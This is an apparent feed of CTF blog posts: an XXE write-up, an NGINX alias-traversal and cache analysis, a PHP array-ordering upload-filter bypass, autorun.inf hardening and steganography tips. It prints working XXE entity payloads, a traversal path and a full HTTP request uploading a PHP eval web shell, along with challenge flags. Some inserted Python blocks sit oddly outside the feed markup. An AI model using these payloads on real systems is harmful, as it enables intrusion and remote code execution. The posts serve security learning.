class="line">"file:///proc/net/arp">]></span><br><span class="line"><plans></span><br><span class="line"><plan></span><br><span class="line"><content>&remote;</content></span><br><span class="line"></plan></span><br><span class="line"></plans></span><br></pre></td></tr></table></figure><p>This yields 3 IPs:</p><ul><li>a few seconds ago 172.19.0.1 0x1 0x2 02:42:ec:2a:71:fb * eth0</li><li>a few seconds ago 172.19.0.4 0x1 0x2 02:42:ac:13:00:04 * eth0</li><li>a few seconds ago 172.19.0.2 0x1 0x2 02:42:ac:13:00:02 * eth0</li></ul><p>Then read the flag file over FTP:</p><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"><?xml version="1.0" encoding="UTF-8"?></span><br><span class="line"><!DOCTYPE person [<!ENTITY remote SYSTEM</span><br><span class="line">"ftp://syc10ver:[email protected]/flag327a6c4304ad5938eaf0efb6cc3e53dc">]></span><br><span class="line"><plans></span><br><span class="line"><plan></span><br><span class="line"><content>payload &remote;</content></span><br><span class="line"></plan></span><br><span class="line"></plans></span><br></pre></td></tr></table></figure><p>sctf{Not_0n1y_xx3_but_als0_web_cache}</p>]]></content>
<summary type="html">
<h1 id="NGINX的秘密"><a href="#NGINX的秘密" class="headerlink" title="NGINX的秘密"></a>The Secret of NGINX</h1><p>An NGINX configuration flaw allows arbitrary file read: /static../etc/nginx/nginx.conf</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br></pre></td><td class="code"><pre><span class="line">user www-data;</span><br><span class="line">worker_processes auto;</span><br><span class="line">pid /run/nginx.pid;</span><br><span class="line"></span><br><span class="line">events &#123;</span><br><span class="line"> worker_connections 
768;</span><br><span class="line"> # multi_accept on;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">http &#123;</span><br><span class="line"></span><br><span class="line"> ##</span><br><span class="line"> # Basic Settings</span><br><span class="line"> ##</span><br><span class="line"></span><br><span class="line"> sendfile on;</span><br><span class="line"> tcp_nopush on;</span><br><span class="line"> tcp_nodelay on;</span><br><span class="line"> keepalive_timeout 65;</span><br><span class="line"> types_hash_max_size 2048;</span><br><span class="line"> # server_tokens off;</span><br><span class="line"></span><br><span class="line"> # server_names_hash_bucket_size 64;</span><br><span class="line"> # server_name_in_redirect off;</span><br><span class="line"></span><br><span class="line"> include /etc/nginx/mime.types;</span><br><span class="line"> default_type application/octet-stream;</span><br><span class="line"></span><br><span class="line"> ##</span><br><span class="line"> # SSL Settings</span><br><span class="line"> ##</span><br><span class="line"></span><br><span class="line"> ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE</span><br><span class="line"> ssl_prefer_server_ciphers on;</span><br><span class="line"></span><br><span class="line"> ##</span><br><span class="line"> # Logging Settings</span><br><span class="line"> ##</span><br><span class="line"></span><br><span class="line"> #access_log /var/log/nginx/access.log;</span><br><span class="line"> #error_log /var/log/nginx/error.log;</span><br><span class="line"></span><br><span class="line"> ##</span><br><span class="line"> # Gzip Settings</span><br><span class="line"> ##</span><br><span class="line"></span><br><span class="line"> gzip on;</span><br><span class="line"> gzip_disable &quot;msie6&quot;;</span><br><span class="line"></span><br><span class="line"> # gzip_vary on;</span><br><span class="line"> # gzip_proxied any;</span><br><span 
class="line"> # gzip_comp_level 6;</span><br><span class="line"> # gzip_buffers 16 8k;</span><br><span class="line"> # gzip_http_version 1.1;</span><br><span class="line"> # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;</span><br><span class="line"></span><br><span class="line"> proxy_cache_path /tmp/mycache levels=1:2 keys_zone=my_cache:10m max_size=10g inactive=30s use_temp_path=off;</span><br><span class="line"> </span><br><span class="line"> limit_conn_zone $binary_remote_addr zone=conn:10m;</span><br><span class="line"> limit_req_zone $binary_remote_addr zone=allips:10m rate=2r/s;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"> server &#123;</span><br><span class="line"> listen 4455 default_server;</span><br><span class="line"> server_name localhost;</span><br><span class="line"></span><br><span class="line"> location /static &#123;</span><br><span class="line"> alias /home/;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> location ~* \.(css|js|gif|png)&#123;</span><br><span class="line"> proxy_cache my_cache;</span><br><span class="line"> proxy_cache_valid 200 30s;</span><br><span class="line"> proxy_pass http://bugweb.app:8000;</span><br><span class="line"> proxy_set_header Host $host:$server_port;</span><br><span class="line"> proxy_ignore_headers Expires Cache-Control Set-Cookie;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> location / &#123;</span><br><span class="line"> limit_conn conn 10;</span><br><span class="line"> proxy_pass http://bugweb.app:8000;</span><br><span class="line"> proxy_set_header Host $host:$server_port;</span><br><span class="line"> &#125;</span><br><span class="line"> &#125;</span><br><span class="line"> ##</span><br><span class="line"> # Virtual Host Configs</span><br><span class="line"> ##</span><br><span 
class="line"></span><br><span class="line"> include /etc/nginx/conf.d/*.conf;</span><br><span class="line"> include /etc/nginx/sites-enabled/*;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#mail &#123;</span><br><span class="line"># # See sample authentication script at:</span><br><span class="line"># # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript</span><br><span class="line"># </span><br><span class="line"># # auth_http localhost/auth.php;</span><br><span class="line"># # pop3_capabilities &quot;TOP&quot; &quot;USER&quot;;</span><br><span class="line"># # imap_capabilities &quot;IMAP4rev1&quot; &quot;UIDPLUS&quot;;</span><br><span class="line"># </span><br><span class="line"># server &#123;</span><br><span class="line"># listen localhost:110;</span><br><span class="line"># protocol pop3;</span><br><span class="line"># proxy on;</span><br><span class="line"># &#125;</span><br><span class="line"># </span><br><span class="line"># server &#123;</span><br><span class="line"># listen localhost:143;</span><br><span class="line"># protocol imap;</span><br><span class="line"># proxy on;</span><br><span class="line"># &#125;</span><br><span class="line">#&#125;</span><br></pre></td></tr></table></figure>
<p>Caching is enabled, and responses for the four file types css|js|gif|png are cached.</p>
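How the location of a cached response is derived from this nginx.conf, as an added example (my own code, not the challenge's or nginx's). It assumes the default proxy_cache_key, which nginx builds by concatenating $scheme, $proxy_host and $request_uri with no separator (that is the KEY: line it writes at the top of each cache file), and the levels=1:2 layout is checked against the path the writeup gives; it also includes the one check a reviewer of this config should make, that location /static paired with alias /home/ lets /static../ escape the aliased directory.

```python
import hashlib
import posixpath


def proxy_cache_key(scheme, proxy_host, request_uri):
    """nginx's default proxy_cache_key is $scheme$proxy_host$request_uri,
    concatenated with no separator. $proxy_host is the host[:port] taken
    from proxy_pass, not the client's Host header."""
    return scheme + proxy_host + request_uri


def cache_file_path(cache_dir, levels, digest):
    """Directory layout produced by proxy_cache_path ... levels=L1:L2[:L3]:
    each level takes the next 1 or 2 hex characters from the END of the
    md5 digest, first level innermost, and the file itself is the digest."""
    widths = [int(w) for w in levels.split(":")]
    parts = []
    end = len(digest)
    for width in widths:
        parts.append(digest[end - width:end])
        end = end - width
    return posixpath.join(cache_dir, *(parts + [digest]))


def explain_cache_file(cache_dir, levels, scheme, proxy_host, request_uri):
    """Key, digest and on-disk path for one proxied request."""
    key = proxy_cache_key(scheme, proxy_host, request_uri)
    digest = hashlib.md5(key.encode()).hexdigest()
    return {
        "key": key,
        "digest": digest,
        "path": cache_file_path(cache_dir, levels, digest),
    }


def alias_traversal_risk(location_prefix, alias_path):
    """True when a prefix location without a trailing slash is paired with an
    alias that has one: /static../x is then rewritten to /home/../x and
    escapes the aliased directory, which is the flaw in this writeup."""
    return (not location_prefix.endswith("/")) and alias_path.endswith("/")


if __name__ == "__main__":
    # The writeup's request, proxied to bugweb.app:8000 and cached under
    # /tmp/mycache with levels=1:2.
    info = explain_cache_file("/tmp/mycache", "1:2", "http",
                              "bugweb.app:8000", "/write_plan/a.js/")
    for name in ("key", "digest", "path"):
        print(name + ": " + info[name])
    print("alias traversal risk:",
          alias_traversal_risk("/static", "/home/"))
```

Compare the printed digest with the hash the writeup quotes; the directory pair is always derived the same way, as the test on the writeup's own hash shows.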
</summary>
</entry>
<entry>
<title>Security issues caused by the difference between PHP arrays and C arrays</title>
<link href="http://fdrag0n.github.io/2018/08/24/PHP%E6%95%B0%E7%BB%84%E4%B8%8Ec%E6%95%B0%E7%BB%84%E5%B7%AE%E5%BC%82%E8%80%8C%E5%BC%95%E5%8F%91%E7%9A%84%E9%97%AE%E9%A2%98/"/>
<id>http://fdrag0n.github.io/2018/08/24/PHP数组与c数组差异而引发的问题/</id>
<published>2018-08-24T14:19:24.000Z</published>
<updated>2019-08-19T03:00:15.638Z</updated>
<content type="html"><![CDATA[<h1 id="C语言数组"><a href="#C语言数组" class="headerlink" title="C语言数组"></a>C arrays</h1><p><strong>A C array consists of contiguous memory locations. The lowest address corresponds to the first element and the highest address to the last element.</strong></p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190819105154.jpg" alt=""></p><p>Suppose we have an array</p><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">int array[2];</span><br></pre></td></tr></table></figure><p>Whether <code>array[0]</code> or <code>array[1]</code> is assigned first, their order in memory is always <code>array[0]</code> first and <code>array[1]</code> after it, so pointing at the last cell of array with a pointer and reading <code>array[1]</code> directly both give the same value.</p><a id="more"></a><h1 id="PHP的数组"><a href="#PHP的数组" class="headerlink" title="PHP的数组"></a>PHP arrays</h1><p><strong>PHP arrays differ from C arrays: an array in PHP is actually an ordered map. A map is a type that associates values with keys. This type is optimized for several different uses, so it can be treated as a true array, a list (vector), a hash table (an implementation of a map), a dictionary, a collection, a stack, a queue and more. Since an array value can itself be an array, trees and multidimensional arrays are also possible.</strong><br>Here is the source of a simple upload filter:</p><pre><code><?php
$file = $_GET['file'];
if (!is_array($file)) {
    $file = explode('.', strtolower($file));
}
print_r ($file);
echo '</br>';
$ext = end($file);
if (!in_array($ext, ['jpg', 'png', 'gif'])) {
    print('This file is not allowed!</br>');
} else print('success!</br>');
var_dump($file);
echo '</br>';
$filename = reset($file) . '.' . $file[count($file) - 1];
echo 'filename:'.$filename;
echo '</br>';
echo 'end($file):'.end($file);
?></code></pre><p>As shown, <code>file[0]</code> and <code>file[1]</code> are both passed as GET parameters. If <code>file[0]</code> is set to png first and then <code>file[1]</code> to php, the request is blocked:</p><pre><code>file[0]=png&file[1]=php</code></pre><p>But if <code>file[1]</code> is set to php first and then <code>file[0]</code> to png, the filter is bypassed and the upload succeeds:</p><pre><code>file[1]=php&file[0]=png</code></pre><p>Demo screenshot:</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190819105132.PNG" alt=""></p><p>Lines 6 and 12 of the code print the array. As the right side of the screenshot shows, if <code>file[0]</code> is set to png first and then <code>file[1]</code> to php, the array is <code>Array ( [0] => png [1] => php )</code> and the request is blocked.</p><p>If instead <code>file[1]</code> is set to php first and then <code>file[0]</code> to png, the array is <code>Array ( [1] => php [0] => png )</code>: the last element in its storage is <code>file[0]=>png</code>, <strong>not</strong> file[1] as it would be in C. So if the filter uses <code>end()</code> in one place to take the last element of the array but <code>$file[count($file) - 1]</code> in another, a bypass exists.</p><h1 id="拿python来比较一下更好说明"><a href="#拿python来比较一下更好说明" class="headerlink" title="拿python来比较一下更好说明"></a>A comparison with Python makes this clearer</h1><ul><li>A C array is more like a Python list</li><li>A PHP array is more like a Python dictionary</li></ul><h1 id="涉及到的CTF:-网鼎杯第二场的上传题–wafUpload"><a href="#涉及到的CTF:-网鼎杯第二场的上传题–wafUpload" class="headerlink" title="涉及到的CTF: 网鼎杯第二场的上传题–wafUpload"></a>Related CTF: wafUpload, the upload challenge from round two of the Wangding Cup (网鼎杯)</h1><pre><code><?php

$sandbox = '/var/www/html/upload/' . md5("phpIsBest" . $_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);

if (!empty($_FILES['file'])) {
    #mime check
    if (!in_array($_FILES['file']['type'], ['image/jpeg', 'image/png', 'image/gif'])) {
        die('This type is not allowed!');
    }
    #check filename
    $file = empty($_POST['filename']) ? $_FILES['file']['name'] : $_POST['filename'];
    if (!is_array($file)) {
        $file = explode('.', strtolower($file));
    }
    $ext = end($file);
    if (!in_array($ext, ['jpg', 'png', 'gif'])) {
        die('This file is not allowed!');
    }
    $filename = reset($file) . '.' . $file[count($file) - 1];
    if (move_uploaded_file($_FILES['file']['tmp_name'], $sandbox . '/' . $filename)) {
        echo 'Success!';
        echo 'filepath:' . $sandbox . '/' . $filename;
    } else {
        echo 'Failed!';
    }
}
show_source(__file__);
?></code></pre><ul><li>Lines 8-10, the mime check section: MIME type checking, bypassed with an image that carries a web shell.</li><li>Lines 12-20, the check filename section: the file extension is checked, and the extension is the last element of the <code>$file</code> array. But when the file name is built, the suffix is taken with <code>$file[count($file) - 1]</code>, which is an obvious bypass. We only need to control the parameters of the <code>$file</code> array to bypass the check and get a shell; the request is as follows:</li></ul><pre><code>POST / HTTP/1.1
Host: 4b590ee044fe8fb3a180712f8407e4136069037e.game.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://4b590ee044fe8fb3a180712f8407e4136069037e.game.ichunqiu.com/
Content-Type: multipart/form-data; boundary=---------------------------9930139772306
Content-Length: 524
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------9930139772123
Content-Disposition: form-data; name="filename[1]"

php
-----------------------------9930139772123
Content-Disposition: form-data; name="filename[0]"

png
-----------------------------9930139772123
Content-Disposition: form-data; name="file"; filename="fdrag0n.jpg"
Content-Type: image/jpeg

<?php @eval($_POST['a']);?>
-----------------------------9930139772123
Content-Disposition: form-data; name="submit"

Submit
-----------------------------9930139772123--</code></pre>]]></content>
<summary type="html">
<h1 id="C语言数组"><a href="#C语言数组" class="headerlink" title="C语言数组"></a>C arrays</h1><p><strong>A C array consists of contiguous memory locations. The lowest address holds the first element and the highest address the last.</strong></p>
<p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190819105154.jpg" alt=""></p>
<p>Suppose there is an array</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">int array[2];</span><br></pre></td></tr></table></figure>
<p>Whether <code>array[0]</code> or <code>array[1]</code> is assigned first, the layout in memory is always <code>array[0]</code> followed by <code>array[1]</code>, so a pointer to the last element of array and a direct reference to <code>array[1]</code> yield the same value.</p>
</summary>
</entry>
<entry>
<title>Using autorun.inf to prevent autorun viruses and personalise the drive icon</title>
<link href="http://fdrag0n.github.io/2018/08/13/%E5%88%A9%E7%94%A8autorun-inf%E9%A2%84%E9%98%B2%E8%87%AA%E5%8A%A8%E8%BF%90%E8%A1%8C%E7%97%85%E6%AF%92%E5%8F%8A%E4%B8%AA%E6%80%A7%E5%8C%96%E7%A3%81%E7%9B%98%E5%9B%BE%E6%A0%87/"/>
<id>http://fdrag0n.github.io/2018/08/13/利用autorun-inf预防自动运行病毒及个性化磁盘图标/</id>
<published>2018-08-13T02:37:01.000Z</published>
<updated>2019-08-19T03:00:22.667Z</updated>
<content type="html"><![CDATA[<h1 id="AutoRun简介"><a href="#AutoRun简介" class="headerlink" title="AutoRun简介"></a>Introduction to AutoRun</h1><p>AutoRun and AutoPlay are components of Microsoft Windows whose contents indicate what action the system may take when it detects a device.</p><p>AutoRun first appeared in Windows 95, intended to help users run the file on a disc that its author wanted run; it could also be triggered by double-clicking a device icon in My Computer. Later, when USB-drive viruses became rampant, Microsoft released an update that disabled AutoRun for non-optical drives.</p><p>From Windows XP onward, Microsoft made it easier for users to pick the relevant application, providing a graphical interface to choose how the files on a device should be handled.</p><h1 id="AutoRun-inf文件"><a href="#AutoRun-inf文件" class="headerlink" title="AutoRun.inf文件"></a>The AutoRun.inf file</h1><p>autorun.inf is one of the more common files met in everyday computer use; it allows a specified file to run automatically when a drive is double-clicked. In recent years, however, autorun.inf has been used to spread trojans and viruses: a user's careless action executes the target program and the machine is compromised, which has had a very negative impact.</p><h1 id="AutoRun-inf的示例"><a href="#AutoRun-inf的示例" class="headerlink" title="AutoRun.inf的示例"></a>An AutoRun.inf example</h1><pre><code>[autorun]
open=setup.exe
icon=setup.exe,0
label=My install CD</code></pre><p>Double-clicking the drive letter runs setup.exe, the drive icon is icon 0 in setup.exe (i.e. the first icon), and the label is My install CD.</p><h1 id="AutoRun-inf的默认激活"><a href="#AutoRun-inf的默认激活" class="headerlink" title="AutoRun.inf的默认激活"></a>When AutoRun.inf is activated by default</h1><ul><li>When the device is inserted.</li><li>When the device is double-clicked in My Computer.</li><li>When the "AutoRun" item in the device's right-click menu in My Computer is chosen.</li><li>Otherwise (e.g. clicking into the root folder) it is not triggered.</li></ul><h2 id="windows-XP-以前"><a href="#windows-XP-以前" class="headerlink" title="windows XP 以前"></a>Before Windows XP</h2><ul><li>Every device type is started according to Autorun.inf.</li></ul><h2 id="Windows-7"><a href="#Windows-7" class="headerlink" title="Windows 7"></a>Windows 7</h2><ul><li>Only optical discs run autorun.inf first.</li></ul><h1 id="利用autorun-inf给硬盘改图标及简易防病毒"><a href="#利用autorun-inf给硬盘改图标及简易防病毒" class="headerlink" title="利用autorun.inf给硬盘改图标及简易防病毒"></a>Using autorun.inf to change a drive icon, and simple virus prevention</h1><h2 id="个性化磁盘—改图标"><a href="#个性化磁盘—改图标" class="headerlink" title="个性化磁盘—改图标"></a>Personalising the drive: changing the icon</h2><p>Create a new text file in the root directory of the drive and put the following in it</p><pre><code>[AUTORUN]
ICON=drag0n.ico</code></pre><p>Then save it as autorun.inf (note: the ico file name should not exceed 6 characters)</p><a id="more"></a><p>Next convert the icon you want into an ico file (a resolution no larger than 48x48 is recommended), put it in the same directory and rename it to drag0n.ico.</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190819105231.png" alt=""></p><h2 id="简易防病毒"><a href="#简易防病毒" class="headerlink" title="简易防病毒"></a>Simple virus prevention</h2><p>At this point the files are visible in the directory; the Windows attrib command can be used to add attributes to them</p><pre><code>The format and common parameters of the attrib command:
ATTRIB [+R | -R] [+A | -A ] [+S | -S] [+H | -H] [[drive:] [path] filename] [/S [/D]]
+ Sets an attribute.
- Clears an attribute.
R Read-only file attribute.
A Archive file attribute.
S System file attribute.
H Hidden file attribute.
I Not-content-indexed file attribute.
[drive:][path][filename] Specifies the file(s) to process.
/S Processes matching files in the current folder and all subfolders.
/D Processes folders as well.
/L Works on the attributes of the symbolic link rather than its target.</code></pre><p>So run</p><pre><code>attrib +s +h +r autorun.inf</code></pre><p>to give autorun.inf the system, hidden and read-only attributes, so that a virus cannot simply overwrite the autorun.inf file (a virus that already has write access to the drive can clear these attributes itself, so this only stops the crude variants)</p><pre><code>attrib +s +h drag0n.ico</code></pre><p>and give drag0n.ico the system and hidden attributes, for tidiness.</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190819105237.png" alt=""></p><p>If you need to change them later, use the following commands to make them visible again</p><pre><code>attrib -s -h -r autorun.inf
attrib -s -h drag0n.ico</code></pre>]]></content>
<summary type="html">
<h1 id="AutoRun简介"><a href="#AutoRun简介" class="headerlink" title="AutoRun简介"></a>Introduction to AutoRun</h1><p>AutoRun and AutoPlay are components of Microsoft Windows whose contents indicate what action the system may take when it detects a device.</p>
<p>AutoRun first appeared in Windows 95, intended to help users run the file on a disc that its author wanted run; it could also be triggered by double-clicking a device icon in My Computer. Later, when USB-drive viruses became rampant, Microsoft released an update that disabled AutoRun for non-optical drives.</p>
<p>From Windows XP onward, Microsoft made it easier for users to pick the relevant application, providing a graphical interface to choose how the files on a device should be handled.</p>
<h1 id="AutoRun-inf文件"><a href="#AutoRun-inf文件" class="headerlink" title="AutoRun.inf文件"></a>The AutoRun.inf file</h1><p>autorun.inf is one of the more common files met in everyday computer use; it allows a specified file to run automatically when a drive is double-clicked. In recent years, however, autorun.inf has been used to spread trojans and viruses: a user's careless action executes the target program and the machine is compromised, which has had a very negative impact.</p>
<h1 id="AutoRun-inf的示例"><a href="#AutoRun-inf的示例" class="headerlink" title="AutoRun.inf的示例"></a>An AutoRun.inf example</h1><pre><code>[autorun]
open=setup.exe
icon=setup.exe,0
label=My install CD
</code></pre><p>Double-clicking the drive letter runs setup.exe, the drive icon is icon 0 in setup.exe (i.e. the first icon), and the label is My install CD.</p>
<h1 id="AutoRun-inf的默认激活"><a href="#AutoRun-inf的默认激活" class="headerlink" title="AutoRun.inf的默认激活"></a>When AutoRun.inf is activated by default</h1><ul>
<li>When the device is inserted.</li>
<li>When the device is double-clicked in My Computer.</li>
<li>When the "AutoRun" item in the device's right-click menu in My Computer is chosen.</li>
<li>Otherwise (e.g. clicking into the root folder) it is not triggered.</li>
</ul>
<h2 id="windows-XP-以前"><a href="#windows-XP-以前" class="headerlink" title="windows XP 以前"></a>Before Windows XP</h2><ul>
<li>Every device type is started according to Autorun.inf.</li>
</ul>
<h2 id="Windows-7"><a href="#Windows-7" class="headerlink" title="Windows 7"></a>Windows 7</h2><ul>
<li>Only optical discs run autorun.inf first.</li>
</ul>
<h1 id="利用autorun-inf给硬盘改图标及简易防病毒"><a href="#利用autorun-inf给硬盘改图标及简易防病毒" class="headerlink" title="利用autorun.inf给硬盘改图标及简易防病毒"></a>Using autorun.inf to change a drive icon, and simple virus prevention</h1><h2 id="个性化磁盘—改图标"><a href="#个性化磁盘—改图标" class="headerlink" title="个性化磁盘—改图标"></a>Personalising the drive: changing the icon</h2><p>Create a new text file in the root directory of the drive and put the following in it</p>
<pre><code>[AUTORUN]
ICON=drag0n.ico
</code></pre><p>Then save it as autorun.inf (note: the ico file name should not exceed 6 characters)</p>
</summary>
</entry>
<entry>
<title>A summary of common CTF steganography techniques</title>
<link href="http://fdrag0n.github.io/2018/07/30/ctf%E5%B8%B8%E8%A7%81%E9%9A%90%E5%86%99%E6%9C%AF%E6%80%BB%E7%BB%93/"/>
<id>http://fdrag0n.github.io/2018/07/30/ctf常见隐写术总结/</id>
<published>2018-07-30T03:57:03.000Z</published>
<updated>2019-08-19T03:00:30.632Z</updated>
<content type="html"><![CDATA[<p><strong>Tools to prepare: WinHex paid edition (the free edition lacks features), Stegsolve, MP3Stego, etc.</strong></p><h1 id="ctf常见隐写术总结"><a href="#ctf常见隐写术总结" class="headerlink" title="ctf常见隐写术总结"></a>A summary of common CTF steganography techniques</h1><h2 id="简单隐写:"><a href="#简单隐写:" class="headerlink" title="简单隐写:"></a>Simple steganography:</h2><ol><li>Right-click to view the image properties and check the image description.</li><li>Open the file in WinHex and Ctrl+F to search for a plaintext flag.</li></ol><a id="more"></a><h2 id="文件类型:"><a href="#文件类型:" class="headerlink" title="文件类型:"></a>File type:</h2><p>The given file is not necessarily what its extension says, so first open it in WinHex and confirm the file type from its header</p><ol><li>JPEG (jpg), header: FFD8FF</li><li>PNG (png), header: 89504E47</li><li>GIF (gif), header: 47494638</li><li>Windows Bitmap (bmp), header: 424D</li><li>ZIP Archive (zip), header: 504B0304</li><li>RAR Archive (rar), header: 52617221</li></ol><h2 id="复合文件:"><a href="#复合文件:" class="headerlink" title="复合文件:"></a>Composite files:</h2><p>In Kali the binwalk tool shows what is embedded, e.g.:</p><pre><code>root@kali:~# binwalk '/root/桌面/misc1.jpg'

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, EXIF standard
12            0xC             TIFF image data, little-endian offset of first image directory: 8
441319        0x6BBE7         Zip archive data, encrypted at least v2.0 to extract, compressed size: 90598, uncompressed size: 91905, name: hidden.jpg
531957        0x81DF5         Zip archive data, encrypted at least v2.0 to extract, compressed size: 38092, uncompressed size: 38829, name: logo.png
570269        0x8B39D         End of Zip archive</code></pre><p>A zip archive is visible inside, so extract it directly with binwalk:</p><p><code>binwalk -e</code></p><h2 id="图片高度"><a href="#图片高度" class="headerlink" title="图片高度"></a>Image height</h2><p>Such images usually carry an obvious hint, including but not limited to an arrow pointing off the edge of the image or the image looking incomplete.<br>Locate the height field for the file type in question and modify it.</p><ol><li>PNG files,</li></ol><h2 id="多图层隐写"><a href="#多图层隐写" class="headerlink" title="多图层隐写"></a>Multi-layer steganography</h2><p>The mightiest tool of all, <strong>zsteg</strong>, is devastatingly effective</p><p>Another great steganography tool: <strong>stegsolve</strong></p><h3 id="LSB隐写"><a href="#LSB隐写" class="headerlink" title="LSB隐写"></a>LSB steganography</h3><ol><li>If the checks above do not find the flag, open the file in Stegsolve and step through the bit planes with the left/right buttons; the flag may show up.</li><li>Extract the low bits; data is usually hidden in bit planes 0, 1 and 2. Use Analyse→Data Extract from the menu and try each in turn.</li></ol>]]></content>
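A miniature of what binwalk does in the composite-file step above: scan a blob for the signatures listed in the file-type section and report their offsets in binwalk's layout. This is an added example, not part of the original post; the sample blob (a JPEG header with a ZIP local-file header appended) is constructed.

```python
"""Locate the file signatures from the post inside a blob and report offsets,
in the DECIMAL / HEXADECIMAL / DESCRIPTION layout binwalk prints.

Added example code, not from the original post; the sample blob is constructed.
"""

# (name, magic bytes) from the post's file-type list
SIGNATURES = (
    ("JPEG image data", bytes.fromhex("FFD8FF")),
    ("PNG image", bytes.fromhex("89504E47")),
    ("GIF image data", bytes.fromhex("47494638")),
    ("Windows bitmap", bytes.fromhex("424D")),
    ("Zip archive data", bytes.fromhex("504B0304")),
    ("RAR archive data", bytes.fromhex("52617221")),
)


def identify(data):
    """Type whose magic sits at offset 0, or None if no listed signature matches."""
    for name, magic in SIGNATURES:
        if data.startswith(magic):
            return name
    return None


def scan(data):
    """Every signature occurrence as a sorted list of (offset, name).

    Two-byte magics such as BMP's 'BM' collide with ordinary data far too
    often, so they are reported at offset 0 only; longer ones anywhere.
    """
    hits = []
    for name, magic in SIGNATURES:
        start = 0
        while True:
            pos = data.find(magic, start)
            if pos == -1:
                break
            if pos == 0 or len(magic) > 2:
                hits.append((pos, name))
            start = pos + 1
    return sorted(hits)


def carve(data, offset):
    """Bytes from `offset` to the end: the trailing archive `binwalk -e` would
    pull out of an image with a zip appended."""
    return data[offset:]


def report(data):
    """Format the scan the way binwalk prints it."""
    lines = ["DECIMAL       HEXADECIMAL     DESCRIPTION", "-" * 60]
    for off, name in scan(data):
        lines.append("%-13d 0x%-13X %s" % (off, off, name))
    return "\n".join(lines)


def build_sample():
    """Constructed: a fake JPEG (SOI marker plus 60 filler bytes) followed by a
    ZIP local file header carrying the name 'hidden.jpg', like misc1.jpg above."""
    jpeg = bytes.fromhex("FFD8FFE0") + bytes(60)
    zip_ = bytes.fromhex("504B0304") + b"hidden.jpg" + bytes(30)
    return jpeg + zip_


if __name__ == "__main__":
    blob = build_sample()
    print(report(blob))
```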
<summary type="html">
<p><strong>Tools to prepare: WinHex paid edition (the free edition lacks features), Stegsolve, MP3Stego, etc.</strong></p>
<h1 id="ctf常见隐写术总结"><a href="#ctf常见隐写术总结" class="headerlink" title="ctf常见隐写术总结"></a>A summary of common CTF steganography techniques</h1><h2 id="简单隐写:"><a href="#简单隐写:" class="headerlink" title="简单隐写:"></a>Simple steganography:</h2><ol>
<li>Right-click to view the image properties and check the image description.</li>
